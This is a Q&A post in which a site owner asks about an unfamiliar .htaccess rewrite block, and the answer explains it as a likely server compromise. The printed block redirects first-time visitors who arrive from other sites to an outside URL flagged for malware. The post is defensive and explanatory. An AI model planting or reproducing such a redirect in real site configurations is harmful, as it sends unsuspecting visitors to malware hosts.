# What does rewriting HTTP_REFERRER and HTTP_HOST do in .htaccess?

Tags: .htaccess, mod-rewrite

I found the following code in my *.htaccess*

```
# Begin redirect block #
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://kasiacleaningservice.com/blog/?p=5510&comment=552792 [L,R]
</IfModule>
# End redirect block #
```

Also I tried to navigate to the URL above an Google suspects it to contain *Malware*. What does the above code do ?

Answer (score 2, accepted):

It's possible that some compromise on the server had placed that block in your htaccess file. I assume the `http://kasiacleaningservice.com` site isn't yours. The `%{HTTP_REFERER}` var is the request's "Referer" header. It's a URL of where the requested URI came from (or was "referred" from). The `%{HTTP_HOST}` var is the "Host" header. The first condition:

```
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
```

Is just creating a capture group of the hostname, sans any subdomain or "www". The second condition:

```
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
```

Is backreferencing the first capture group (via the `%1`) and comparing that with the "Host" header value. Essentially it's making sure the host in the referer is a **different** host in the URL that was requested. This means that the *first* time I go to any page on your site, I immediately get redirected to `http://kasiacleaningservice.com/blog/?p=5510&comment=552792`. But if I'm already on your site, I can navigate it just fine without any redirecting.